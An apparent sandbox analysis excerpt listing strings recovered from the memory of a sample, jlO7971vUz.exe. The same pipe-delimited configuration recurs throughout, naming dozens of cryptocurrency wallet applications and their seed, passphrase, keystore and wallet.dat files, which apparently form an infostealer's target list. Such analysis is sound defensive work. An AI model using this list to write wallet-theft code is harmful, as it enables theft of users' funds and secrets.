Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage/
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json+
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\SysWOW64\Bcp47Langs.dllodus\exodus.wallet\\passphrase.json
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage/
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\SysWOW64\Bcp47Langs.dllodus\exodus.wallet\\passphrase.json
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp`
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage/
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json+
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
